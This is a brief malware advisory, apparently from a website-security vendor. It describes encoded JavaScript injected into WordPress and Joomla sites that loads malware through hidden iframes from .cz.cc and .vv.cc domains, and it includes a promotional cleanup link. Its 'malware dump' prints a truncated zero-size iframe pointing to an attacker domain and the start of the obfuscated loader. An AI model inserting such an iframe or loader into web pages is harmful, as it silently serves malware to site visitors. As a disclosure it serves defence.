Description:Encoded javascript that loads malware (iframes) from multiple .co.cc domains (specially from carolinsoll.cz.cc and zanomos.vv.cc):
zanomos.vv.cc
http://carolinsoll.cz.cc/QQkFBwQHBQEJBQcEAAYMBQAFAA==
Affecting: Any web site (common on WordPress and Joomla).
Clean up: Our team can clean up it for you: http://sucuri.net/signup/
Malware dump:
<iframe src="http://carolinsoll.cz.cc/QQkFBwQHBQEDBwYBEkcJBQcEAAYMBQA..==" width="0" height="0"..
var xffc58678d52444={f00de2d9c6d:function(r199470){var t8c48bd9e=r199470.substr(this.t03dd50(),3)-602,....